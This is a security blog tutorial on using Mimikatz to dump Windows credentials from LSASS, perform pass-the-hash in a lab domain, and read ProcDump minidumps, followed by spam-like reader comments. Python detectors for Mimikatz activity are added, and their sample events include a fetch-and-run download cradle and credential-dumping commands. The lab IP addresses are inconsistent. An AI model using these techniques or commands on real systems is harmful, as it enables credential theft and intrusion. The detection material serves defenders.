Mimikatz – Windows Tutorial for Beginners (Part 1)


Mimikatz is a tool written in C by Benjamin Delpy for Windows security. It is an awesome tool for gathering credentials using various methods. Besides gathering credentials, Mimikatz can perform various Windows security operations such as:

  • Pass-the-Hash and Over-Pass-the-Hash
  • Pass-the-Tickets
  • Building Golden Tickets
  • And much more

In order to gather credentials and hashes, administrator privilege will be needed; how to escalate privileges in a Windows environment can be found on this awesome blog.

To dump credentials, we will start with the most popular module: SEKURLSA.

Sekurlsa

This module provides the functionality of extracting passwords, hashes and tickets by reading the memory of LSASS.exe (Local Security Authority Subsystem Service).

Overview of LSASS

LSASS (Local Security Authority Subsystem Service) is a Windows service which provides the user with Single Sign-On (SSO). Single sign-on is a session and user authentication service that permits a user to use one set of login credentials (e.g., name and password) to access multiple applications. The service authenticates the end user for all the applications the user has been given rights to and eliminates further prompts when the user switches applications during the same session. LSASS verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens. To make SSO work it keeps credential material cached in its memory, and Mimikatz reads that cache to hand the attacker the credentials of the logged-on users.

Note: To Perform the operations with Mimikatz, Administrator Privilege is required.

Running Mimikatz using various methods

Firstly, we need to check whether we have administrator privileges on the system.

Now that we have checked our privileges on the Windows box, let's get our hands dirty.

Firstly, we need to download Mimikatz and run it. There are multiple ways to run Mimikatz and get credentials.

1. We can download the executable from this GitHub link and run it from the command prompt.

[Screenshot: mimikatz.exe running from the command prompt]

2. We can use the PowerShell Mimikatz script (Invoke-Mimikatz.ps1) to run specific functions of Mimikatz. But first we need to download this script and load it, which can also be done in two ways.

a. Loading the script from disk (actually downloading it to the machine).

b. Loading the script in memory (fetching it straight into the PowerShell session, without writing it to disk).

[Screenshot: downloading and loading Invoke-Mimikatz.ps1]

After downloading the Invoke-Mimikatz.ps1 script, we now need to load it into the PowerShell session.

Now that the script is loaded in the session, we can easily see what functionality it offers us with the following command.
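Since the script can be pulled straight into memory, defenders cannot rely on finding Invoke-Mimikatz.ps1 on disk. The following is an added example written for this article (it is not part of the original post, nor of Mimikatz or Invoke-Mimikatz): a small Python detector that scores PowerShell Script Block Logging events (event ID 4104) for the loading and invocation patterns shown above. The indicator weights, the alert threshold, and the sample events with their hostnames and URLs are all constructed for the example.

```python
"""Added example (not from the original post): find Invoke-Mimikatz being
loaded or executed via PowerShell Script Block Logging.

Event 4104 in Microsoft-Windows-PowerShell/Operational carries the text of
each script block PowerShell compiles, after de-obfuscation of things like
string concatenation. An in-memory load (nothing touches disk) therefore
still leaves the script text in the log. Indicators, weights, the alert
threshold and the sample events are constructed assumptions for this
example.
"""
import re
from dataclasses import dataclass

# (indicator name, regex, weight). The function name and mimikatz module
# syntax are strong signals; a download cradle or IEX on its own is weak.
INDICATORS = [
    ("invoke-mimikatz cmdlet", re.compile(r"invoke-mimikatz", re.I), 3),
    ("mimikatz module syntax",
     re.compile(r"\b(sekurlsa|lsadump|privilege::debug|kerberos::)", re.I), 3),
    ("dumpcreds switch", re.compile(r"-dumpcreds\b", re.I), 2),
    ("remote download cradle",
     re.compile(r"\.(downloadstring|downloadfile)\s*\(", re.I), 1),
    ("invoke-expression", re.compile(r"\b(iex|invoke-expression)\b", re.I), 1),
]
ALERT_THRESHOLD = 3   # assumption: a bare cradle (score 2) is logged, not alerted


@dataclass(frozen=True)
class ScriptBlockAlert:
    host: str
    user: str
    score: int
    hits: tuple
    excerpt: str


def score_script_block(text: str):
    """Return (score, names of matched indicators) for one script block."""
    hits = [(name, weight) for name, rx, weight in INDICATORS if rx.search(text)]
    return sum(w for _, w in hits), tuple(name for name, _ in hits)


def detect_mimikatz_script_blocks(events):
    """Alert on 4104 events whose script text scores at or above threshold."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        text = ev.get("ScriptBlockText", "")
        score, hits = score_script_block(text)
        if score >= ALERT_THRESHOLD:
            alerts.append(ScriptBlockAlert(
                host=ev.get("Computer", "?"),
                user=ev.get("UserID", "?"),
                score=score,
                hits=hits,
                excerpt=text[:80],
            ))
    return alerts


# Constructed sample events (not real telemetry); hostnames and URLs are made up.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "DC1", "UserID": "alice",
     "ScriptBlockText": r"Get-ChildItem C:\Logs | Where-Object Length -gt 1MB"},
    {"EventID": 4104, "Computer": "DC1", "UserID": "bob",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString("
                        "'http://files.example.invalid/Invoke-Mimikatz.ps1')"},
    {"EventID": 4104, "Computer": "DC1", "UserID": "bob",
     "ScriptBlockText": r"Import-Module .\Invoke-Mimikatz.ps1; Invoke-Mimikatz -DumpCreds"},
    {"EventID": 4104, "Computer": "DC1", "UserID": "svc_build",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString("
                        "'https://pkgs.example.invalid/install.ps1')"},
    {"EventID": 4104, "Computer": "DC1", "UserID": "bob",
     "ScriptBlockText": "Invoke-Mimikatz -Command '\"privilege::debug\" \"sekurlsa::logonpasswords\"'"},
    {"EventID": 4103, "Computer": "DC1", "UserID": "bob",
     "ScriptBlockText": "Invoke-Mimikatz"},
]

if __name__ == "__main__":
    for a in detect_mimikatz_script_blocks(SAMPLE_EVENTS):
        print(f"[{a.host}] {a.user} score={a.score} {a.hits}: {a.excerpt}")
```

Script block logging is switched on through the "Turn on PowerShell Script Block Logging" group policy setting; without it there are no 4104 events to search. Plain string matching is easy to defeat by renaming the function, so treat this as a baseline and pair it with AMSI-backed antivirus detections rather than as a complete control.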

Now, to get the logon credentials, we just need to fire up the Mimikatz prompt with the following commands.

Firstly, we need the debug privilege.

The debug privilege (SeDebugPrivilege) allows a process to debug another process that it wouldn't otherwise have access to. For example, a process running as a user with the debug privilege enabled on its token can debug, and therefore read the memory of, a service running as Local System, which is why Mimikatz needs it to open lsass.exe.

[Screenshot: privilege::debug]
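From the defensive side, enabling the debug privilege is itself auditable. The Python below is an added example (mine, not from the original post or from Mimikatz) that reviews Windows Security event 4703 records, which are written when a process adjusts privileges on its token, and alerts on SeDebugPrivilege being enabled by anything outside a small baseline. The baseline set and the sample events are constructed assumptions.

```python
"""Added example (not from the original post): flag SeDebugPrivilege being
enabled on a token, the side effect of mimikatz's privilege::debug.

Windows Security event 4703 ("A user right was adjusted") is written when a
process enables or disables privileges on its token, provided the
"Audit Authorization Policy Change" subcategory is turned on. Its
EnabledPrivilegeList and ProcessName fields are what this rule keys on.
The events below are constructed for the example; the allowlist is an
assumption to tune per host.
"""
from dataclasses import dataclass

# Hypothetical baseline of processes that legitimately toggle
# SeDebugPrivilege on a stock Windows host; anything else gets an alert.
BASELINE_DEBUG_PRIVILEGE_PROCESSES = {
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\taskmgr.exe",
}


@dataclass(frozen=True)
class Alert:
    host: str
    user: str
    process: str
    privileges: tuple


def parse_privilege_list(raw: str) -> set:
    """4703 stores the list whitespace-separated (tabs/newlines in the XML);
    some log forwarders join the names with commas, so accept both."""
    return set(raw.replace(",", " ").split())


def detect_debug_privilege(events):
    """Return one Alert per 4703 event that enables SeDebugPrivilege from a
    process outside the baseline, in log order."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4703:
            continue
        enabled = parse_privilege_list(ev.get("EnabledPrivilegeList", ""))
        if "SeDebugPrivilege" not in enabled:
            continue
        process = ev.get("ProcessName", "").lower()
        if process in BASELINE_DEBUG_PRIVILEGE_PROCESSES:
            continue
        alerts.append(Alert(
            host=ev.get("Computer", "?"),
            user=ev.get("SubjectUserName", "?"),
            process=process,
            privileges=tuple(sorted(enabled)),
        ))
    return alerts


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4703, "Computer": "DC1", "SubjectUserName": "SYSTEM",
     "ProcessName": r"C:\Windows\System32\svchost.exe",
     "EnabledPrivilegeList": "SeDebugPrivilege"},
    {"EventID": 4703, "Computer": "DC1", "SubjectUserName": "bob",
     "ProcessName": r"C:\Users\bob\Desktop\mimikatz.exe",
     "EnabledPrivilegeList": "SeDebugPrivilege"},
    {"EventID": 4703, "Computer": "DC1", "SubjectUserName": "bob",
     "ProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "EnabledPrivilegeList": "SeDebugPrivilege\n\t\t\tSeBackupPrivilege"},
    {"EventID": 4703, "Computer": "DC1", "SubjectUserName": "backupsvc",
     "ProcessName": r"C:\Program Files\Backup\agent.exe",
     "EnabledPrivilegeList": "SeBackupPrivilege, SeRestorePrivilege"},
    {"EventID": 4624, "Computer": "DC1", "SubjectUserName": "bob"},
]

if __name__ == "__main__":
    for alert in detect_debug_privilege(SAMPLE_EVENTS):
        print(f"[{alert.host}] {alert.user} enabled {alert.privileges} via {alert.process}")
```

Event 4703 only exists when the Audit Authorization Policy Change subcategory is enabled, and on a busy server it is noisy, so the quality of the baseline matters more than the rule itself.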

We are all set to see the magic...

Getting LogonPasswords

[Screenshot: sekurlsa::logonPasswords output]

We can see that the command gives a very verbose account of the credentials of each user session. logonPasswords returns every piece of information related to the user credentials: the module gives an integrated output of the individual providers such as msv, tspkg, wdigest, and the other packages as well.

This result can also be obtained by running the Invoke-Mimikatz PowerShell script.

This juicy information from the above command can be used to perform various techniques, and one such technique is Pass-the-Hash.

Pass-the-Hash

Pass-the-Hash is a technique an attacker uses to get access to a system on the network using the NTLM hash of a particular user of that system, without ever knowing the password. It is mainly used for lateral (horizontal) movement in the pentesting methodology.

The table below shows the lab environment setup:

IP Address        Computer Name      Description               Windows Version
192.168.52.100    DC-HACKNPENTEST    This is the Domain Controller    Windows Server 2016
192.168.52.200    DC1                This is the Domain Client        Windows Server 2008

Firstly, we need to find the hash of the user on which we aim to perform the Pass-the-Hash technique, which is the Administrator of hacknpentest.local (192.168.52.100, the forest root).

As we can see in the image below, the administrator's hash is extracted using the logonPasswords functionality.

Now that we have the hash of Administrator, we only need to call the pth (pass-the-hash) functionality of the sekurlsa module.

We need to pass the following arguments to the sekurlsa::pth command:

  • /user : the domain user whose hash we are passing.
  • /domain : the domain of that user.
  • /ntlm : the NTLM hash of the user (RC4 can also be used, since the NTLM hash is the RC4 key).

After the execution of the command we get a command prompt, but wait, what does it say!!

The system still assumes that we are the administrator of the DC1 system (192.168.52.200): the injected hash is only used when the new process authenticates over the network. We will use PsExec.exe to get a command prompt as Administrator on hacknpentest.local.

And here we are with the Administrator command prompt of the hacknpentest system (192.168.52.200).

Now that we have seen the Pass-the-Hash technique, we will see how to dump credentials from an offline memory dump.

Dumping Credentials from an Offline Memory Dump

In this section we will dump the memory of lsass.exe with the help of the Sysinternals tool ProcDump, and from that dump file (.dmp) we will extract the credentials.

Now we will load this lsass.dmp in Mimikatz to extract the credentials using the minidump functionality of the SEKURLSA module.

This method can also be used to dump credentials when we are not allowed to run Mimikatz on the victim's machine. In that case we take the dump file, copy it to our own machine, and load it into Mimikatz there using minidump.
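Whether the credentials are read live with sekurlsa::logonPasswords or from a ProcDump minidump, some process first has to open a handle to lsass.exe with read access, and that is the point where a defender can look. The Python below is an added example (mine, not from the original post, Mimikatz or Sysinternals) that evaluates Sysmon ProcessAccess events (event ID 10) against lsass.exe; it covers both the live dump earlier in this post and the ProcDump method in this section. The process baseline and the sample events are constructed assumptions.

```python
"""Added example (not from the original post): flag processes that open
lsass.exe memory, which both sekurlsa::logonPasswords (live) and a ProcDump
minidump have to do.

Sysmon event 10 (ProcessAccess) records SourceImage, TargetImage, the
GrantedAccess mask and a CallTrace of the modules on the caller's stack.
Sysmon only emits it for targets named in its ProcessAccess rules, so the
config must list lsass.exe. The rule here:
  * target image is lsass.exe,
  * the mask includes PROCESS_VM_READ (0x10) or is PROCESS_ALL_ACCESS,
  * the source is not a baselined security product or OS component,
  * extra signal: "UNKNOWN" frames in CallTrace, i.e. code not backed by a
    file on disk, typical of a reflectively loaded Invoke-Mimikatz.
The baseline set and all sample events are constructed assumptions.
"""
from dataclasses import dataclass

PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF

# Hypothetical baseline of image names that read LSASS memory by design;
# build it from your own Sysmon data rather than copying it.
BASELINE_LSASS_READERS = {"msmpeng.exe", "csrss.exe", "wininit.exe"}


@dataclass(frozen=True)
class LsassAccessAlert:
    host: str
    source_image: str
    granted_access: int
    reasons: tuple


def image_name(path: str) -> str:
    """Lower-cased basename of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_access(ev: dict):
    """Return (suspicious, reasons) for one event; non-event-10 records are ignored."""
    if ev.get("EventID") != 10 or image_name(ev.get("TargetImage", "")) != "lsass.exe":
        return False, ()
    mask = int(ev.get("GrantedAccess", "0x0"), 16)
    reasons = []
    if mask == PROCESS_ALL_ACCESS:
        reasons.append("PROCESS_ALL_ACCESS on lsass (typical of dump tools)")
    elif mask & PROCESS_VM_READ:
        reasons.append("PROCESS_VM_READ on lsass")
    if not reasons:
        return False, ()   # query-only handles (0x1000, 0x1400) are routine
    if image_name(ev.get("SourceImage", "")) in BASELINE_LSASS_READERS:
        return False, ()
    if "UNKNOWN" in ev.get("CallTrace", ""):
        reasons.append("unbacked code in CallTrace (possible in-memory loader)")
    return True, tuple(reasons)


def detect_lsass_access(events):
    """One alert per suspicious LSASS access, in log order."""
    alerts = []
    for ev in events:
        suspicious, reasons = analyse_access(ev)
        if suspicious:
            alerts.append(LsassAccessAlert(
                host=ev.get("Computer", "?"),
                source_image=ev["SourceImage"],
                granted_access=int(ev["GrantedAccess"], 16),
                reasons=reasons,
            ))
    return alerts


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 10, "Computer": "DC1",
     "SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c534|C:\Windows\System32\KERNELBASE.dll+2050d"},
    {"EventID": 10, "Computer": "DC1",
     "SourceImage": r"C:\Users\bob\Desktop\mimikatz.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c534|C:\Users\bob\Desktop\mimikatz.exe+4a12"},
    {"EventID": 10, "Computer": "DC1",
     "SourceImage": r"C:\Tools\procdump64.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1fffff",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c534|C:\Tools\procdump64.exe+1c9e"},
    {"EventID": 10, "Computer": "DC1",
     "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c534|UNKNOWN(000001D6F3A20A1C)"},
    {"EventID": 10, "Computer": "DC1",
     "SourceImage": r"C:\Windows\system32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1400",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9c534"},
    {"EventID": 1, "Computer": "DC1", "Image": r"C:\Windows\system32\notepad.exe"},
]

if __name__ == "__main__":
    for a in detect_lsass_access(SAMPLE_EVENTS):
        print(f"[{a.host}] {a.source_image} 0x{a.granted_access:x}: {'; '.join(a.reasons)}")
```

On the prevention side the same handle can be refused outright: running LSA as a protected process (the RunAsPPL value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa) stops unsigned code from opening lsass.exe with read access, and Credential Guard moves the secrets out of LSASS altogether. Disabling WDigest (UseLogonCredential = 0 under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest) at least keeps clear-text passwords out of the logonPasswords output on older systems.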

But wait! Can we run the Mimikatz tool remotely?

Running Mimikatz Remotely

The Invoke-Mimikatz script offers the functionality of running against a remote machine and presents the user with the same output.

Well, this awesome tool has much more functionality to offer, like pass-the-ticket, extracting ekeys, building golden and silver tickets, playing with DPAPI master keys and much more.

To know how it can be done, stay tuned to Hacknpentest.com

Till then, HacknPentest!!!


13 Responses

  1. Chrinstine says:

    I’ve been browsing online more than 3 hours nowadays, but I by no means found
    any attention-grabbing article like yours. It’s
    pretty worth sufficient for me. In my opinion, if all web owners and bloggers made
    excellent content material as you probably did,
    the net shall be much more useful than ever before.
    Wow, this paragraph is good, my sister is analyzing these kinds of things, so I
    am going to inform her. I will right away grab your rss feed
    as I can’t find your email subscription link or newsletter service.
    Do you have any? Kindly allow me recognise so that I may subscribe.
    Thanks.

    • Satyam Dubey says:

      Thanks for showing love to our blog by giving this wonderful feedback. We are soon planning to launch the email subscription feature for our users. Till that Stay tuned to hacknpentest.

  2. Louise says:

    Hello to every one, for the reason that I am
    actually keen of reading this blog’s post to be updated regularly.

    It carries fastidious material.

  3. I’m not sure exactly why but this website is loading incredibly slow for me.
    Is anyone else having this problem or is it a problem on my end?
    I’ll check back later and see if the problem still exists.

  4. Cclibbs says:

    I’ve been exploring for a bit for any high-quality articles or weblog posts on this
    kind of space . Exploring in Yahoo I eventually stumbled upon this site.
    Reading this information So I’m happy to exhibit that I have an incredibly just right
    uncanny feeling I discovered just what I needed. I so much undoubtedly will make certain to don't forget
    this website and give it a look on a constant basis.

  5. Anonymous says:

    These are truly enormous ideas in regarding blogging. You have touched some fastidious things here.
    Any way keep up writing.

  6. oprol evorter says:

    This design is wicked! You certainly know how to keep a reader entertained. Between your wit and your videos, I was almost moved to start my own blog (well, almost…HaHa!) Fantastic job. I really enjoyed what you had to say, and more than that, how you presented it. Too cool!

  7. Lionel says:

    You’ve made some decent points there. I checked on the net for more
    info about the issue and found most people will go along with your views on this web site.

  8. cresent moon cafe says:

    Thanks for ones marvelous posting! I truly enjoyed reading it,
    you will be a great author. I will ensure that I bookmark
    your blog and will often come back sometime soon. I want
    to encourage continue your great work, have a
    nice weekend!
